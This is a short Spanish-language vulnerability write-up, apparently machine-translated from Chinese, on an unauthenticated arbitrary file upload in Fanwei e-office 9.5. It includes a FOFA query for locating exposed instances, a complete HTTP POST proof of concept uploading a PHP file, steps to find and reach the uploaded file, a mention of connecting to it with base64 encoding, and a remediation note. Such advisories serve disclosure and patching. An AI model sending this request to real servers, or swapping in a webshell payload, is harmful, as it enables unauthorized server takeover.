0x01 Introducción del producto
Fanwei E-Office es un software de oficina OA colaborativo estandarizado, uno de los miembros de la serie de productos de oficina colaborativa de Fanwei. Implementa un diseño de producto generalizado y satisface completamente las necesidades de gestión empresarial. Cree una plataforma de oficina móvil, sin papel y digital.
Descripción general de la vulnerabilidad 0x02
Existe una vulnerabilidad de carga de archivos arbitrarios en la interfaz del archivo fuente /webservice/upload.php de Fanwei e-office versión 9.5 Los atacantes maliciosos no autenticados pueden cargar archivos maliciosos para obtener el control del servidor de destino.
0x03 rango de influencia
Fanwei Oficina electrónica 9.5
0x04 Entorno de recurrencia
FOFA: app="Fanwei-EOffice"
0x05 Reaparición de vulnerabilidad
PoC
POST /webservice/upload.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl
Accept-Encoding: gzip
Connection: close
------WebKitFormBoundaryakbyiukl
Content-Disposition: form-data; name="file"; filename="a.php4"
Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundaryakbyiukl--
PD: La cadena de números en el cuerpo de la respuesta es el nombre de la carpeta cargada, seguido de * es el nombre del archivo
verificar URL
http://your-ip/attachment/回显的那串数字/a.php4
subir
Intente conectarse (tenga en cuenta la codificación base64)
0x06 Sugerencia de reparación
En la actualidad, las vulnerabilidades anteriores han sido reparadas por el oficial y los usuarios afectados pueden actualizar a una versión segura.
Enlace de descarga oficial: https://service.e-office.cn/download